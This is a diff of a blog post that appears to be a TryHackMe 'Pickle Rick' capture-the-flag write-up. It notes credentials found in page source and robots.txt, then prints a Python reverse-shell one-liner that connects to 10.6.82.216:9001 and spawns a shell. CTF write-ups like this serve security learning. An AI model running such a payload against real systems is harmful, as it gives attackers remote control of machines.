JoeyLipton/joeylipton.github.io/_posts/2022-01-16-TryHackMe-Pickle-Rick.md

 Username found in the page source

-Password found in the robots.txt
+The password found in the robots.txt file

 #### Shell Script that worked on the website

+After some testing, and script brute-forcing, I found that python commands can be executed on the website.

 ```
 python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.6.82.216",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'